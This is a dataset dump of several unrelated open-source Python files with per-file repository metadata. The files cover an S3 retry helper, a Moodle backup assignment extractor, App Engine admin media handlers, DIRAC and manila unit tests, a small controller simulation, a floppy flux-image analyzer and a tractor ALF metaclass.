continue
logger_.critical("Failed record: %s, %s", event, boto_exc)
raise boto_exc
# flush the queue
batch_processor.send_all()
# note: if there are multiple content exceptions in the batch, this will
# only raise the most recent one;
# re-raise so that get_contents() failures end up in the DLQ
if content_exception:
logger_.critical("Failed batch due to %s", content_exception)
raise content_exception
def retry_s3(
operation,
bucket,
key,
size=None,
limit=None,
*,
etag,
version_id,
s3_client
):
"""retry head or get operation to S3 with; stop before we run out of time.
retry is necessary since, due to eventual consistency, we may not
always get the required version of the object.
"""
if operation == "head":
function_ = s3_client.head_object
elif operation == "get":
function_ = s3_client.get_object
else:
raise ValueError(f"unexpected operation: {operation}")
# Keyword arguments to function_
arguments = {
"Bucket": bucket,
"Key": key
}
if operation == 'get' and size and limit:
# can only request range if file is not empty
arguments['Range'] = f"bytes=0-{min(size, limit)}"
if version_id:
arguments['VersionId'] = version_id
else:
arguments['IfMatch'] = etag
@retry(
# debug
reraise=True,
stop=stop_after_attempt(MAX_RETRY),
wait=wait_exponential(multiplier=2, min=4, max=30),
retry=(retry_if_exception(should_retry_exception))
)
def call():
"""local function so we can set stop_after_delay dynamically"""
# TODO: remove all this, stop_after_delay is not dynamically loaded anymore
return function_(**arguments)
return call()
| apache-2.0 | -3,470,820,596,382,642,000 | 35.356589 | 116 | 0.553817 | false |
ocdude/mbzextract | mbzextract/plugins/assignment/assignment.py | 1 | 8744 | import os
import xml.etree.ElementTree as et
import html
from datetime import datetime
from jinja2 import Environment, PackageLoader
class moodle_module:
def __init__(self, **kwargs):
self.backup = kwargs['backup']
self.temp_dir = kwargs['temp_dir']
self.db = kwargs['db']
self.directory = kwargs['directory']
self.final_dir = kwargs['working_dir']
self.db_cursor = self.db.cursor()
# create table for this activity
query = 'CREATE TABLE IF NOT EXISTS assignments (activityid int PRIMARY KEY,moduleid int,contextid int,name text,intro text,assignmenttype text)'
self.db_cursor.execute(query)
if kwargs['student_data'] == True:
# create table for the submissions to the assignments
query = 'CREATE TABLE IF NOT EXISTS assignment_submissions (submissionid int PRIMARY KEY,activityid int,userid int,timecreated int,timemodified int,data text,grade real,comment text,teacher int,timemarked int)'
self.db_cursor.execute(query)
self.student_data = kwargs['student_data']
else:
self.student_data = False
# commit the changes
self.db.commit()
self.env = Environment(loader=PackageLoader(
'mbzextract.plugins.assignment', 'templates'))
def parse(self):
"""Parse the assignment.xml and inforef.xml files to get the details
for the assignment and any files associated with it."""
assignment_xml = et.parse(self.backup.open(
self.directory + "/assignment.xml")).getroot()
inforef_xml = et.parse(self.backup.open(
self.directory + "/inforef.xml")).getroot()
# add assignments to the database
assignment = (assignment_xml.get('id'),
assignment_xml.get('moduleid'),
assignment_xml.get('contextid'),
assignment_xml.find('./assignment/name').text,
html.unescape(assignment_xml.find(
'./assignment/intro').text),
assignment_xml.find('./assignment/assignmenttype').text)
self.db_cursor.execute(
'INSERT INTO assignments VALUES(?,?,?,?,?,?)', assignment)
self.current_id = assignment_xml.get('id')
# check to see if the backup file has student data in it
if self.student_data == True:
for submission in assignment_xml.findall('./assignment/submissions/submission'):
entry = (submission.get('id'),
assignment_xml.get('id'),
submission.find('userid').text,
submission.find('timecreated').text,
submission.find('timemodified').text,
submission.find('data1').text,
submission.find('grade').text,
submission.find('submissioncomment').text,
submission.find('teacher').text,
submission.find('timemarked').text)
self.db_cursor.execute(
'INSERT INTO assignment_submissions VALUES(?,?,?,?,?,?,?,?,?,?)', entry)
self.files = self.backup.list_files(inforef_xml, self.db_cursor)
# commit all changes to db
self.db.commit()
def extract(self):
self.db_cursor.execute(
'SELECT * FROM assignments WHERE activityid=?', (self.current_id,))
results = self.db_cursor.fetchone()
path = os.path.join(self.final_dir, self.backup.stripped(results[3]))
if os.path.exists(path) == False:
os.makedirs(path)
os.chdir(path)
if self.student_data == True:
self.db_cursor.execute(
'SELECT submissionid,userid,timemodified,data,grade,comment,teacher,timemarked FROM assignment_submissions WHERE activityid=? ORDER BY timemodified DESC', (self.current_id,))
sub_results = self.db_cursor.fetchall()
submissions = []
if results[5] == 'online' or results[5] == 'offline':
# extract online text
for sub in sub_results:
# grab name of student from db
self.db_cursor.execute(
'SELECT firstname,lastname FROM users WHERE userid=?', (sub[1],))
user = self.db_cursor.fetchone()
username = user[0] + " " + user[1]
# grab name of teacher from db
self.db_cursor.execute(
'SELECT firstname,lastname FROM users WHERE userid=?', (sub[6],))
teacher = self.db_cursor.fetchone()
if teacher is not None:
grader = teacher[0] + " " + teacher[1]
else:
grader = ""
# construct submission
submissions.append({'id': sub[0],
'user': username,
'timemodified': datetime.fromtimestamp(sub[2]),
'data': sub[3],
'grade': sub[4],
'comment': sub[5],
'teacher': grader,
'timemarked': sub[7]})
template = self.env.get_template('online_text.html')
output = template.render(name=results[3],
intro=results[4],
student_data=self.student_data,
submissions=submissions)
os.chdir(path)
with open('assignment.html', 'w+') as f:
f.write(output)
f.close()
elif results[5] == 'upload' or results[5] == 'uploadsingle':
for sub in sub_results:
# grab name of student from db
self.db_cursor.execute(
'SELECT firstname,lastname FROM users WHERE userid=?', (sub[1],))
user = self.db_cursor.fetchone()
username = user[0] + " " + user[1]
# grab name of teacher from db
self.db_cursor.execute(
'SELECT firstname,lastname FROM users WHERE userid=?', (sub[6],))
teacher = self.db_cursor.fetchone()
if teacher is not None:
grader = teacher[0] + " " + teacher[1]
else:
grader = ""
# construct submission
submissions.append({'id': sub[0],
'user': username,
'timemodified': datetime.fromtimestamp(sub[2]),
'grade': sub[4],
'comment': sub[5],
'teacher': grader,
'timemarked': sub[7]})
# grab all files submitted by this student
self.db_cursor.execute(
'SELECT contenthash,contextid,filename,userid FROM files WHERE userid=? AND contextid=?', (sub[1], results[2]))
files = self.db_cursor.fetchall()
submitted_files = []
if files is not None:
for f in files:
os.chdir(self.temp_dir)
if not os.path.exists(os.path.join(path, username)):
os.makedirs(os.path.join(path, username))
self.backup.extract_file(
f[0], os.path.join(path, username, f[2]))
# construct file list
submitted_files.append(
{'url':os.path.join(username, f[2]), 'filename': f[2]})
# write the output assignment.html
template = self.env.get_template('upload.html')
output = template.render(name=results[3],
intro=results[4],
student_data=self.student_data,
submissions=submissions,
files=submitted_files)
os.chdir(path)
                with open('assignment.html', 'w+') as f:
                    f.write(output)
| mit | -2,250,443,401,529,729,000 | 48.123596 | 222 | 0.483074 | false |
synth3tk/the-blue-alliance | controllers/admin/admin_media_controller.py | 1 | 3104 | import json
import logging
import os
from google.appengine.ext.webapp import template
from controllers.base_controller import LoggedInHandler
from helpers.media_helper import MediaParser
from helpers.media_manipulator import MediaManipulator
from models.media import Media
class AdminMediaDashboard(LoggedInHandler):
"""
Show stats about Media
"""
def get(self):
self._require_admin()
media_count = Media.query().count()
self.template_values.update({
"media_count": media_count
})
path = os.path.join(os.path.dirname(__file__), '../../templates/admin/media_dashboard.html')
self.response.out.write(template.render(path, self.template_values))
class AdminMediaDeleteReference(LoggedInHandler):
def post(self, media_key_name):
self._require_admin()
media = Media.get_by_id(media_key_name)
media.references.remove(media.create_reference(
self.request.get("reference_type"),
self.request.get("reference_key_name")))
MediaManipulator.createOrUpdate(media, auto_union=False)
self.redirect(self.request.get('originating_url'))
class AdminMediaMakePreferred(LoggedInHandler):
def post(self, media_key_name):
self._require_admin()
media = Media.get_by_id(media_key_name)
media.preferred_references.append(media.create_reference(
self.request.get("reference_type"),
self.request.get("reference_key_name")))
MediaManipulator.createOrUpdate(media)
self.redirect(self.request.get('originating_url'))
class AdminMediaRemovePreferred(LoggedInHandler):
def post(self, media_key_name):
self._require_admin()
media = Media.get_by_id(media_key_name)
media.preferred_references.remove(media.create_reference(
self.request.get("reference_type"),
self.request.get("reference_key_name")))
MediaManipulator.createOrUpdate(media, auto_union=False)
self.redirect(self.request.get('originating_url'))
class AdminMediaAdd(LoggedInHandler):
def post(self):
self._require_admin()
media_dict = MediaParser.partial_media_dict_from_url(self.request.get('media_url').strip())
if media_dict is not None:
year_str = self.request.get('year')
if year_str == '':
year = None
else:
year = int(year_str.strip())
media = Media(
id=Media.render_key_name(media_dict['media_type_enum'], media_dict['foreign_key']),
foreign_key=media_dict['foreign_key'],
media_type_enum=media_dict['media_type_enum'],
details_json=media_dict.get('details_json', None),
year=year,
references=[Media.create_reference(
self.request.get('reference_type'),
self.request.get('reference_key'))],
)
MediaManipulator.createOrUpdate(media)
self.redirect(self.request.get('originating_url'))
| mit | -390,828,834,690,328,260 | 30.673469 | 100 | 0.633054 | false |
ic-hep/DIRAC | Resources/Catalog/ConditionPlugins/test/Test_FilenamePlugin.py | 1 | 1420 | """ Test the FilenamePlugin class"""
import unittest
from DIRAC.Resources.Catalog.ConditionPlugins.FilenamePlugin import FilenamePlugin
__RCSID__ = "$Id $"
class TestfilenamePlugin( unittest.TestCase ):
""" Test the FilenamePlugin class"""
def setUp(self):
self.lfns = [ '/lhcb/lfn1', '/lhcb/anotherlfn', '/otherVo/name']
def test_01_endswith(self):
""" Testing endswith (method with argument"""
fnp = FilenamePlugin("endswith('n')")
self.assert_( not fnp.eval( lfn = '/lhcb/lfn1' ) )
self.assert_( fnp.eval( lfn = '/lhcb/lfn' ) )
def test_02_find( self ):
""" Testing special case of find"""
fnp = FilenamePlugin( "find('lfn')" )
    self.assertTrue( fnp.eval( lfn = '/lhcb/lfn1' ) )
    self.assertTrue( not fnp.eval( lfn = '/lhcb/l0f0n' ) )
def test_03_isalnum( self ):
""" Testing isalnum (method without argument"""
fnp = FilenamePlugin( "isalnum()" )
    self.assertTrue( fnp.eval( lfn = 'lhcblfn1' ) )
    self.assertTrue( not fnp.eval( lfn = '/lhcb/lf_n' ) )
def test_04_nonExisting( self ):
""" Testing non existing string method"""
fnp = FilenamePlugin( "nonexisting()" )
    self.assertTrue( not fnp.eval( lfn = 'lhcblfn1' ) )
    self.assertTrue( not fnp.eval( lfn = '/lhcb/lf_n' ) )
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase( TestfilenamePlugin )
unittest.TextTestRunner( verbosity = 2 ).run( suite )
| gpl-3.0 | -7,581,871,400,807,415,000 | 25.792453 | 82 | 0.635211 | false |
zang3t5u/DCSC_Robots | dcsc_consensus/scripts/Leader_class.py | 1 | 1041 | from numpy import array, minimum, maximum, amin, amax
from numpy.linalg import eig
import time
class Leader:
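  # PD-style leader/reference model. Judging from the A/B structure the state
  # is [x, x_delayed, y, y_delayed] tracking the 2-D input u; this layout is
  # inferred from the matrices, not documented in the original source.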
def __init__(self, kp, kd, dt, state = array([[0], [0], [0], [0]])):
self.A = array([[-kp+kd/dt, -kd/dt, 0, 0], [1, -1, 0, 0], [0, 0, -kp+kd/dt, -kd/dt], [0, 0, 1, -1]])
self.B = array([[kp, 0], [0, 0], [0, kp], [0, 0]])
self.state = state
self.dt = dt
self.kp = kp
self.kd = kd
self.sat = array([[1,float('infinity'),1,float('infinity')]]).T
def step(self,u):
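    # Saturated forward-Euler step: the state derivative is clamped
    # elementwise to +/- self.sat before being integrated over one dt.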
delta = self.A.dot(self.state) + self.B.dot(u)
self.state = self.state + self.dt * minimum ( self.sat , maximum( delta , -self.sat ) )
def stability(self):
    # numpy.linalg.eig returns (eigenvalues, eigenvectors); stability of the
    # continuous-time system requires every eigenvalue of A to have a negative
    # real part, so only the eigenvalues' real parts are inspected here.
    # (The original iterated over the whole (w, v) tuple, mixing eigenvector
    # entries into the min/max.)
    ev = eig(self.A)[0].real
    print amin(ev)
    print amax(ev)
if __name__ == "__main__":
l = Leader(1,0.05,0.1, array([[0, 0, 0, 0]]).T)
l.stability()
while True:
l.step(array([[1,1]]).T)
print l.state.T
time.sleep(l.dt)
| gpl-2.0 | 7,395,056,700,263,450,000 | 23.209302 | 102 | 0.569645 | false |
scality/manila | manila/tests/compute/test_nova.py | 1 | 12412 | # Copyright 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
from novaclient import exceptions as nova_exception
from novaclient import utils
from novaclient.v2 import servers as nova_servers
from manila.compute import nova
from manila import context
from manila import exception
from manila import test
from manila.volume import cinder
class Volume(object):
def __init__(self, volume_id):
self.id = volume_id
self.name = volume_id
class Network(object):
def __init__(self, net_id):
self.id = net_id
self.label = 'fake_label_%s' % net_id
class FakeNovaClient(object):
class Servers(object):
def get(self, instance_id):
return {'id': instance_id}
def list(self, *args, **kwargs):
return [{'id': 'id1'}, {'id': 'id2'}]
def create(self, *args, **kwargs):
return {'id': 'created_id'}
def __getattr__(self, item):
return None
class Volumes(object):
def get(self, volume_id):
return Volume(volume_id)
def list(self, detailed, *args, **kwargs):
return [{'id': 'id1'}, {'id': 'id2'}]
def create(self, *args, **kwargs):
return {'id': 'created_id'}
def __getattr__(self, item):
return None
class Networks(object):
def get(self, net_id):
return Network(net_id)
class FixedIPs(object):
def get(self, fixed_ip):
return dict(address=fixed_ip)
def reserve(self, fixed_ip):
return None
def unreserve(self, fixed_ip):
return None
def __init__(self):
self.servers = self.Servers()
self.volumes = self.Volumes()
self.keypairs = self.servers
self.networks = self.Networks()
self.fixed_ips = self.FixedIPs()
@nova.translate_server_exception
def decorated_by_translate_server_exception(self, context, instance_id, exc):
if exc:
raise exc(instance_id)
else:
return 'OK'
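# The helper above lets each test drive the translate_server_exception
# decorator with an arbitrary novaclient exception (or none) and inspect the
# translated manila-side result.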
@ddt.ddt
class TranslateServerExceptionTestCase(test.TestCase):
def test_translate_server_exception(self):
result = decorated_by_translate_server_exception(
'foo_self', 'foo_ctxt', 'foo_instance_id', None)
self.assertEqual('OK', result)
def test_translate_server_exception_not_found(self):
self.assertRaises(
exception.InstanceNotFound,
decorated_by_translate_server_exception,
'foo_self', 'foo_ctxt', 'foo_instance_id', nova_exception.NotFound)
def test_translate_server_exception_bad_request(self):
self.assertRaises(
exception.InvalidInput,
decorated_by_translate_server_exception,
'foo_self', 'foo_ctxt', 'foo_instance_id',
nova_exception.BadRequest)
@ddt.data(
nova_exception.HTTPNotImplemented,
nova_exception.RetryAfterException,
nova_exception.Unauthorized,
nova_exception.Forbidden,
nova_exception.MethodNotAllowed,
nova_exception.OverLimit,
nova_exception.RateLimit,
)
def test_translate_server_exception_other_exception(self, exc):
self.assertRaises(
exception.ManilaException,
decorated_by_translate_server_exception,
'foo_self', 'foo_ctxt', 'foo_instance_id', exc)
@ddt.ddt
class NovaApiTestCase(test.TestCase):
def setUp(self):
super(NovaApiTestCase, self).setUp()
self.api = nova.API()
self.novaclient = FakeNovaClient()
self.ctx = context.get_admin_context()
self.mock_object(nova, 'novaclient',
mock.Mock(return_value=self.novaclient))
self.mock_object(nova, '_untranslate_server_summary_view',
lambda server: server)
def test_server_create(self):
result = self.api.server_create(self.ctx, 'server_name', 'fake_image',
'fake_flavor', None, None, None)
self.assertEqual('created_id', result['id'])
def test_server_delete(self):
self.mock_object(self.novaclient.servers, 'delete')
self.api.server_delete(self.ctx, 'id1')
self.novaclient.servers.delete.assert_called_once_with('id1')
def test_server_get(self):
instance_id = 'instance_id1'
result = self.api.server_get(self.ctx, instance_id)
self.assertEqual(instance_id, result['id'])
def test_server_get_by_name_or_id(self):
instance_id = 'instance_id1'
server = {'id': instance_id, 'fake_key': 'fake_value'}
self.mock_object(utils, 'find_resource',
mock.Mock(return_value=server))
result = self.api.server_get_by_name_or_id(self.ctx, instance_id)
self.assertEqual(instance_id, result['id'])
utils.find_resource.assert_called_once_with(mock.ANY, instance_id)
@ddt.data(
{'nova_e': nova_exception.NotFound(404),
'manila_e': exception.InstanceNotFound},
{'nova_e': nova_exception.BadRequest(400),
'manila_e': exception.InvalidInput},
)
@ddt.unpack
def test_server_get_failed(self, nova_e, manila_e):
nova.novaclient.side_effect = nova_e
instance_id = 'instance_id'
self.assertRaises(manila_e, self.api.server_get, self.ctx, instance_id)
def test_server_list(self):
self.assertEqual([{'id': 'id1'}, {'id': 'id2'}],
self.api.server_list(self.ctx))
def test_server_pause(self):
self.mock_object(self.novaclient.servers, 'pause')
self.api.server_pause(self.ctx, 'id1')
self.novaclient.servers.pause.assert_called_once_with('id1')
def test_server_unpause(self):
self.mock_object(self.novaclient.servers, 'unpause')
self.api.server_unpause(self.ctx, 'id1')
self.novaclient.servers.unpause.assert_called_once_with('id1')
def test_server_suspend(self):
self.mock_object(self.novaclient.servers, 'suspend')
self.api.server_suspend(self.ctx, 'id1')
self.novaclient.servers.suspend.assert_called_once_with('id1')
def test_server_resume(self):
self.mock_object(self.novaclient.servers, 'resume')
self.api.server_resume(self.ctx, 'id1')
self.novaclient.servers.resume.assert_called_once_with('id1')
def test_server_reboot_hard(self):
self.mock_object(self.novaclient.servers, 'reboot')
self.api.server_reboot(self.ctx, 'id1')
self.novaclient.servers.reboot.assert_called_once_with(
'id1', nova_servers.REBOOT_HARD)
def test_server_reboot_soft(self):
self.mock_object(self.novaclient.servers, 'reboot')
self.api.server_reboot(self.ctx, 'id1', True)
self.novaclient.servers.reboot.assert_called_once_with(
'id1', nova_servers.REBOOT_SOFT)
def test_server_rebuild(self):
self.mock_object(self.novaclient.servers, 'rebuild')
self.api.server_rebuild(self.ctx, 'id1', 'fake_image')
self.novaclient.servers.rebuild.assert_called_once_with('id1',
'fake_image',
None)
def test_instance_volume_attach(self):
self.mock_object(self.novaclient.volumes, 'create_server_volume')
self.api.instance_volume_attach(self.ctx, 'instance_id',
'vol_id', 'device')
self.novaclient.volumes.create_server_volume.\
assert_called_once_with('instance_id', 'vol_id', 'device')
def test_instance_volume_detach(self):
self.mock_object(self.novaclient.volumes, 'delete_server_volume')
self.api.instance_volume_detach(self.ctx, 'instance_id',
'att_id')
self.novaclient.volumes.delete_server_volume.\
assert_called_once_with('instance_id', 'att_id')
def test_instance_volumes_list(self):
self.mock_object(
self.novaclient.volumes, 'get_server_volumes',
mock.Mock(return_value=[Volume('id1'), Volume('id2')]))
self.cinderclient = self.novaclient
self.mock_object(cinder, 'cinderclient',
mock.Mock(return_value=self.novaclient))
result = self.api.instance_volumes_list(self.ctx, 'instance_id')
self.assertEqual(2, len(result))
self.assertEqual('id1', result[0].id)
self.assertEqual('id2', result[1].id)
def test_server_update(self):
self.mock_object(self.novaclient.servers, 'update')
self.api.server_update(self.ctx, 'id1', 'new_name')
self.novaclient.servers.update.assert_called_once_with('id1',
name='new_name')
def test_update_server_volume(self):
self.mock_object(self.novaclient.volumes, 'update_server_volume')
self.api.update_server_volume(self.ctx, 'instance_id', 'att_id',
'new_vol_id')
self.novaclient.volumes.update_server_volume.\
assert_called_once_with('instance_id', 'att_id', 'new_vol_id')
def test_keypair_create(self):
self.mock_object(self.novaclient.keypairs, 'create')
self.api.keypair_create(self.ctx, 'keypair_name')
self.novaclient.keypairs.create.assert_called_once_with('keypair_name')
def test_keypair_import(self):
self.mock_object(self.novaclient.keypairs, 'create')
self.api.keypair_import(self.ctx, 'keypair_name', 'fake_pub_key')
self.novaclient.keypairs.create.\
assert_called_once_with('keypair_name', 'fake_pub_key')
def test_keypair_delete(self):
self.mock_object(self.novaclient.keypairs, 'delete')
self.api.keypair_delete(self.ctx, 'fake_keypair_id')
self.novaclient.keypairs.delete.\
assert_called_once_with('fake_keypair_id')
def test_keypair_list(self):
self.assertEqual([{'id': 'id1'}, {'id': 'id2'}],
self.api.keypair_list(self.ctx))
def test_fixed_ip_get(self):
fixed_ip = 'fake_fixed_ip'
result = self.api.fixed_ip_get(self.ctx, fixed_ip)
self.assertIsInstance(result, dict)
self.assertEqual(fixed_ip, result['address'])
def test_fixed_ip_reserve(self):
fixed_ip = 'fake_fixed_ip'
result = self.api.fixed_ip_reserve(self.ctx, fixed_ip)
self.assertIsNone(result)
def test_fixed_ip_unreserve(self):
fixed_ip = 'fake_fixed_ip'
result = self.api.fixed_ip_unreserve(self.ctx, fixed_ip)
self.assertIsNone(result)
def test_network_get(self):
net_id = 'fake_net_id'
net = self.api.network_get(self.ctx, net_id)
self.assertIsInstance(net, dict)
self.assertEqual(net_id, net['id'])
class ToDictTestCase(test.TestCase):
def test_dict_provided(self):
fake_dict = {'foo_key': 'foo_value', 'bar_key': 'bar_value'}
result = nova._to_dict(fake_dict)
self.assertEqual(fake_dict, result)
def test_obj_provided_with_to_dict_method(self):
expected = {'foo': 'bar'}
class FakeObj(object):
def __init__(self):
self.fake_attr = 'fake_attr_value'
def to_dict(self):
return expected
fake_obj = FakeObj()
result = nova._to_dict(fake_obj)
self.assertEqual(expected, result)
def test_obj_provided_without_to_dict_method(self):
expected = {'foo': 'bar'}
class FakeObj(object):
def __init__(self):
self.foo = expected['foo']
fake_obj = FakeObj()
result = nova._to_dict(fake_obj)
self.assertEqual(expected, result)
| apache-2.0 | -7,645,553,551,109,569,000 | 35.398827 | 79 | 0.609491 | false |
veteman/thepython2blob | floppyinforead.py | 1 | 8961 | #Copyright 2015 B. Johan G. Svensson
#Licensed under the terms of the MIT license (see LICENSE).
from __future__ import division
import string, struct, collections
import fsslib, floppytrack
#import floppyinforead
#dsk = floppyinforead.analyzedisc('j:\\Transfer\\CloudKingdom.fss')
##-Take a coffee break...
#print(floppyinforead.printtable(dsk, 5)) #revolution
#image = floppyinforead.extractimage(dsk,80,2,10) #tracks, sides, sectors, (size=512)
#fid = open('CloudKingdom.data','wb')
#fid.write(image)
#fid.close()
#Create a string type that doesn't fill the screen with data:
class Silentstring(str):
__repr__ = object.__repr__
class Silentlist(list):
__repr__ = object.__repr__
Track = collections.namedtuple('Track', ['trtimedata', 'trsynced', 'trmfmdec', 'sectors'])
Sector = collections.namedtuple('Sector', ['metadata', 'data'])
def sorthelper(a):
try:
return a[0]
except TypeError:
return a
def analyzedisc(fname):
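    # Iterates all 164 track/side combinations (82 tracks x 2 sides) of the
    # flux-stream image; each analysetrack call does the heavy decoding, hence
    # the coffee-break warning in the usage notes above.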
fid = open(fname, 'rb')
floppy = fsslib.Reader(fid)
fid.close()
retlst = Silentlist()
for t in xrange(164):
side = t%2
track = t//2
print "------Track:", track, "Side:", side
retlst.append(analysetrack((side,track), *floppy.gettrack(side, track)))
return retlst
def analysetrack(sidetrck,timedata, indpuls):
print indpuls
bitsout, indexes = floppytrack.syncronize(timedata, indpuls)
dataout, markers, indxp = floppytrack.mfmdecode(bitsout, indexes)
markerpairs, unknownmarkers = floppytrack.lookupaddressmarkers(dataout, markers)
mrkrspairs = floppytrack.revolutionseparate(markerpairs, indxp)
unknownmrkrs = floppytrack.revolutionseparate(unknownmarkers, indxp)
trtimedata = {'timedata' : timedata, 'indpuls' : indpuls}
trsynced = {'rawbits' : bitsout, 'indpuls' : indexes}
trmfmdec = {'data' : dataout, 'markers' : markers, 'indpuls' : indxp}
sectors = Silentlist()
for rev in zip(mrkrspairs, unknownmrkrs):
#print "---INDEX---"
sectors.append(analyserevol(sidetrck, dataout, *rev))
track = Track(trtimedata=trtimedata, trsynced=trsynced, trmfmdec=trmfmdec, sectors=sectors)
return track
def analyserevol(sidetrck, data, mrkrspairs, unknownmrkrs):
markers = mrkrspairs + unknownmrkrs
sortmark = sorted(markers,key=sorthelper)
retlst = Silentlist()
for mark in sortmark:
try:
if len(mark) == 2:
retlst.append(analysesector(sidetrck, mark, data))
else:
print "Unkown type of marker-tuple received!", mark , sidetrck
except TypeError:
retlst.append(analysedudmark(mark, data))
return retlst
def analysesector(sidetrck, mark, data):
#If it's a pair the id-field should always exits - but may be faulty
sectid = floppytrack.addressdecode(mark[0],data)
data, datainfo = floppytrack.dataextract(mark[1],sectid['size'],data)
sector = Sector(metadata=dict(sectid.items() + datainfo.items()), data=Silentstring(data))
return sector
def analysedudmark(mark, data):
print mark
print "dudmark", hex(ord(data[mark]))
themark = data[mark]
if struct.unpack('B',themark)[0] == 0xFE:
# If id-field is truncated: sectid = dict()
sectid = floppytrack.addressdecode(mark,data)
else:
sectid = dict()
sector = Sector(metadata=sectid, data=themark)
return sector
def getinfo(sector,tracknum,sidenum):
probstr = ""
try:
if sector.metadata['side'] != sidenum or sector.metadata['track'] != tracknum:
probstr = "*"
elif len(sector.data) == 1: #This is id-field with no data (data contains only 0xFE)
probstr = "?"
elif len(sector.data) != sector.metadata['size']:
probstr = "T"
elif not sector.metadata['datacrcok']:
probstr = "!" # CRC error
elif sector.metadata['sizecode'] != 2:
probstr = "#" # Unusual sector size
except KeyError:
#Dudmark
if len(sector.data) != 1:
raise ValueError('dudmarks should always have data of length 1')
#Note: This is not a sector number as above - this is hexdata.
return "D" + "{0:02x}".format(ord(sector.data)).upper()
return probstr + str(sector.metadata['sectnum'])
def printtable(disc,rev):
layoutstr='Detection:' + ' '*16
for num in range(1,33):
layoutstr+=string.rjust(str(num),4,' ')
for track in xrange(len(disc)):
tracknum = track//2
sidenum = track%2
layoutstr+='\n'
layoutstr+='Layout Track: '
layoutstr+=string.rjust(str(tracknum),2,'0')
layoutstr+=' Side: ' + str(sidenum) + ': '
if rev < len(disc[track].sectors):
for sectnum in xrange(len(disc[track].sectors[rev])):
layoutstr+=string.rjust(getinfo(disc[track].sectors[rev][sectnum],tracknum,sidenum),4,' ')
layoutstr+='\n'
layoutstr+='\n\n'
layoutstr+='#=Non 512 bytes sectors, !=CRC-Error, ?=Unknown/faulty mark'
layoutstr+='\n'
layoutstr+='*=Track/side numbering is wrong, TI=Truncated ID, TD=Truncated Data'
layoutstr+='\n'
layoutstr+='Only one is shown - increasing priority # -> ! -> * -> ?/TD/TI.'
layoutstr+='\n'
return layoutstr
def extractsector(sector, ntrack, nsides, sectorsize):
data = sector.data
tracknum = ntrack//nsides
sidenum = ntrack%nsides
bad = False
try:
if sector.metadata['track'] != tracknum:
bad = True
if sector.metadata['side'] != sidenum:
bad = True
if not sector.metadata['idcrcok']:
bad = True
if not sector.metadata['datacrcok']:
bad = True
if sector.metadata['size'] != sectorsize:
bad = True
        if sector.metadata['size'] > sectorsize:
            data = data[:sectorsize]
        else:
            data += '\0'*(sectorsize - len(data))
except KeyError:
return 0, True, ''
return sector.metadata['sectnum'], bad, data
def extractimage(discstruct,ntracks,nsides,nsectors,sectorsize=512):
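    # Assembly strategy: pre-fill an (ntracks*nsides) x nsectors grid with
    # zero-byte sectors, then walk every decoded revolution and keep the best
    # copy of each sector (a good read may overwrite an earlier bad one).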
disc = discstruct.sectors
ntracksides = ntracks * nsides
validsectors = set(range(1,nsectors + 1))
imagelst = []
badlst = []
missinglst = []
for ntrack in xrange(ntracksides):
imagelst.append([])
badlst.append([])
missinglst.append([])
for nsector in xrange(nsectors):
            imagelst[ntrack].append('\0'*sectorsize)  # a string, so '+=' works when assembling
badlst[ntrack].append(True)
missinglst[ntrack].append(True)
for ntrack, track in enumerate(disc):
for nrev, rev in enumerate(track.sectors):
for nsector, sector in enumerate(rev):
sectnum, bad, data = extractsector(sector, ntrack, nsides, sectorsize)
                if sectnum not in validsectors:
continue
if bad:
print 'Bad sector in in-image:',
print 'Track:', ntrack//nsides,
print ' Side:', ntrack%nsides,
print ' Num:', sectnum,
print ' Rev:', nrev
                if badlst[ntrack][sectnum - 1]:
                    # Keep the best copy seen so far: only overwrite while the
                    # stored copy is still flagged bad, and store the
                    # length-normalised data returned by extractsector.
                    imagelst[ntrack][sectnum - 1] = data
                badlst[ntrack][sectnum - 1] = bad
                missinglst[ntrack][sectnum - 1] = False
#imagelst[ntrack*nsides + nside][ntrack]
image = Silentstring()
badsectors = []
missingsectors = []
for ntrack in xrange(ntracksides):
for nsector in xrange(nsectors):
            image += imagelst[ntrack][nsector]
            if missinglst[ntrack][nsector]:
print 'Missing sector in out-image:',
print 'Track:', ntrack//nsides,
print ' Side:', ntrack%nsides,
print ' Num:', nsector+1
elif badlst[ntrack][nsector]:
print 'Bad sector in out-image:',
print 'Track:', ntrack//nsides,
print ' Side:', ntrack%nsides,
print ' Num:', nsector+1
return image
def savetascsv(disc,track, fname):
floppytrack.savetascsv(disc[track].trtimedata['timedata'], fname)
| mit | -6,355,469,575,399,865,000 | 36.792208 | 106 | 0.582747 | false |
Byron/btractor | src/python/btractor/alf/base.py | 1 | 12523 | #-*-coding:utf-8-*-
"""
@package btractor.alf.base
@brief Base classes for use with tractor
@author Sebastian Thiel
@copyright [GNU Lesser General Public License](https://www.gnu.org/licenses/lgpl.html)
"""
from __future__ import unicode_literals
from butility.future import str
__all__ = ['AlfOperatorMeta', 'AlfOperator', 'AlfTreeOperator']
from butility import (GraphIterator,
Meta)
# ==============================================================================
## @name Alf Base Classes
# ------------------------------------------------------------------------------
## @{
class AlfOperatorMeta(Meta):
"""Metaclass setting up descriptors for accessing stored values based on the schema."""
__slots__ = ()
attr_prefix = '_'
class TypeCheckingDescriptor(object):
"""Checks for a given type and converts appropriately"""
__slots__ = (
'attr', ## Name of the attribute we refer to
'type' ## type of the attribute we refer to
)
iterable_types = (tuple, list, set)
def __init__(self, attr, type):
self.attr = attr
self.type = type
def _attrname(self):
"""@return name of the instance attribute"""
return AlfOperatorMeta.attr_prefix + self.attr
def __get__(self, inst, cls):
"""default-aware getter"""
if inst is None:
return self
# allow access to descriptor itself
try:
return getattr(inst, self._attrname())
except AttributeError:
# return empty lists or None !
# None is used as a marker to indicate a value is not set
if issubclass(self.type, self.iterable_types):
value = self.type()
else:
value = None
# end handle nil type
# cache the value for later
self.__set__(inst, value)
return value
# end handle value is unset
def __set__(self, inst, value):
# None is always allowed as this marks an attribute unset
if value is not None and not isinstance(value, self.type):
# scalar value to list conversion
if issubclass(self.type, self.iterable_types) and not isinstance(value, self.iterable_types):
value = [value]
# end handle scalar conversion
value = self.type(value)
setattr(inst, self._attrname(), value)
